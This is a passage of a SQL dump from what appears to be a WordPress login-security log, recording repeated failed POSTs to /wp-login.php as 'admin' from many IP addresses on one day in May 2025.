00:00:00'),(95467,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39334\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.232.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746951308.502538;s:12:\"REQUEST_TIME\";i:1746951308;}}','103.90.232.143',0,'2025-05-11 13:45:10','1970-01-01 00:00:00'),(95468,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60120\";s:11:\"REMOTE_ADDR\";s:12:\"86.104.37.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746951756.788065;s:12:\"REQUEST_TIME\";i:1746951756;}}','86.104.37.37',0,'2025-05-11 13:52:38','1970-01-01 00:00:00'),(95469,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53064\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.104.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746952201.732878;s:12:\"REQUEST_TIME\";i:1746952201;}}','134.209.104.76',0,'2025-05-11 14:00:03','1970-01-01 00:00:00'),(95470,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43036\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746952647.8649011;s:12:\"REQUEST_TIME\";i:1746952647;}}','31.172.67.59',0,'2025-05-11 14:07:29','1970-01-01 00:00:00'),(95471,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36346\";s:11:\"REMOTE_ADDR\";s:11:\"89.45.83.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746953092.645206;s:12:\"REQUEST_TIME\";i:1746953092;}}','89.45.83.89',0,'2025-05-11 14:14:54','1970-01-01 00:00:00'),(95472,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41126\";s:11:\"REMOTE_ADDR\";s:14:\"178.22.126.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746953535.0415771;s:12:\"REQUEST_TIME\";i:1746953535;}}','178.22.126.103',0,'2025-05-11 14:22:16','1970-01-01 00:00:00'),(95473,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45472\";s:11:\"REMOTE_ADDR\";s:13:\"103.163.214.6\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746953971.6562669;s:12:\"REQUEST_TIME\";i:1746953971;}}','103.163.214.6',0,'2025-05-11 14:29:33','1970-01-01 00:00:00'),(95474,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34366\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746954410.740618;s:12:\"REQUEST_TIME\";i:1746954410;}}','198.54.120.17',0,'2025-05-11 14:36:52','1970-01-01 00:00:00'),(95475,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44908\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746954843.650996;s:12:\"REQUEST_TIME\";i:1746954843;}}','209.172.2.50',0,'2025-05-11 14:44:05','1970-01-01 00:00:00'),(95476,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41538\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.232.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746955279.5891631;s:12:\"REQUEST_TIME\";i:1746955279;}}','162.0.232.89',0,'2025-05-11 14:51:21','1970-01-01 00:00:00'),(95477,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57178\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.26.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP